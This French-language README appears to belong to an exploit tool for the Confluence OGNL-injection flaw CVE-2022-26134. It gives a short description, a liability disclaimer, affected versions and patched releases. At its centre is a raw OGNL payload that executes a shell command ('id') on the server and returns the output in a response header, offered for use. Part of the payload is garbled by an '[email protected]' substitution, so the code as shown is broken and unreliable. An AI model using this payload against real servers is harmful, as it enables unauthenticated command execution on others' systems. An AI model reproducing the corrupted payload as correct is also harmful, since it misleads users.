BotCon
Attlasian Confluence Exécution de code à distance non authentifiée via injection OGNL (CVE-2022-26134)
- Le 2 juin 2022, Atlassian a publié un avis de sécurité pour ses applications Confluence Server et Data Center, signalant une vulnérabilité critique d'exécution de code à distance non authentifiée. La vulnérabilité d'injection OGNL permet à un utilisateur non authentifié d'exécuter du code arbitraire sur une instance Confluence Server ou Data Center.
À LIRE !
À utiliser avec précaution. Vous êtes responsable de vos actions.
Les développeurs déclinent toute responsabilité et ne sont pas responsables de tout usage abusif ou dommage.

Payload brut
${(#[email protected]@toString(@java.lang.Runtime@getRuntime().exec("id").getInputStream(),"utf-8")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader("X-Cmd-Response",#a))}
Détails du bug
-
Produit affecté :
- Confluence
- Confluence Server
- Confluence Data Center
-
Versions affectées :
- Toutes les versions prises en charge de Confluence Server et Data Center sont affectées.
- Les versions de Confluence Server et Data Center postérieures à 1.3.0 sont affectées.
Atténuations
- Mettez à jour votre version Attlasian Confluence vers ces versions corrigées :
- 7.4.17
- 7.13.7
- 7.14.3
- 7.15.2
- 7.16.4
- 7.17.4
- 7.18.1